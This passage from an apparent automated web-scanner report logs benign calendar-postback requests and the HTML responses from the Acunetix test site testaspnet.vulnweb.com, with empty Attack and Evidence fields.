href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1095 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,095 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8400&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgBA0PXB6toIZGRkX5dX9lug2nVueFOMHWLUmxJGe8s%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLEr8L2CgL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gWZFlD5gonyFYpsphztEUMsD48o9A%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:56:21 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgBA0PXB6toIZGRkX5dX9lug2nVueFOMHWLUmxJGe8s=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLEr8L2CgL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gWZFlD5gonyFYpsphztEUMsD48o9A==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:White" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:Black" title="January 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:Black" title="January 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:Black" title="January 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:Black" title="January 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:Black" title="January 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:Black" title="January 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:Black" title="January 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:Black" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1183 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,183 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8275&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgCALUCIiNoIZGRknr0SMlb3QYfEURG5641z85C9KaM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLErNLuAQLtiZ78CwLHkIz%2BDgKK%2BZ%2FNDAKK%2BZ%2FNDAKK%2BbPgBQKK%2BbPgBQKK%2BaeHDQKK%2BaeHDQKK%2BZvsCwKK%2BZvsCwKK%2BY%2BDAwKK%2BY%2BDAwK%2Fk%2FvECQK%2Fk%2FvECQK%2Fk%2B%2BbAQK%2Fk%2B%2BbAQK%2Fk4O%2BCgK%2Fk4O%2BCgK%2Fk7fVAwK%2Fk7fVAwK%2Fk6voDAK%2Fk6voDAK%2Fk9%2BMBAK%2Fk9%2BMBAK%2Fk%2FOjDQK%2Fk%2FOjDQK%2Fk%2BfGBgK%2Fk%2BfGBgK%2Fk9uvAwK%2Fk9uvAwK%2Fk8%2FCDAK%2Fk8%2FCDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV%2BAkCkLqV%2BAkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgApM%2BFVb3B2%2BO0a0AMMeEIIypx5OH
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:43:37 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgCALUCIiNoIZGRknr0SMlb3QYfEURG5641z85C9KaM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLErNLuAQLtiZ78CwLHkIz+DgKK+Z/NDAKK+Z/NDAKK+bPgBQKK+bPgBQKK+aeHDQKK+aeHDQKK+ZvsCwKK+ZvsCwKK+Y+DAwKK+Y+DAwK/k/vECQK/k/vECQK/k++bAQK/k++bAQK/k4O+CgK/k4O+CgK/k7fVAwK/k7fVAwK/k6voDAK/k6voDAK/k9+MBAK/k9+MBAK/k/OjDQK/k/OjDQK/k+fGBgK/k+fGBgK/k9uvAwK/k9uvAwK/k8/CDAK/k8/CDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV+AkCkLqV+AkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgApM+FVb3B2+O0a0AMMeEIIypx5OH" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:White" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a 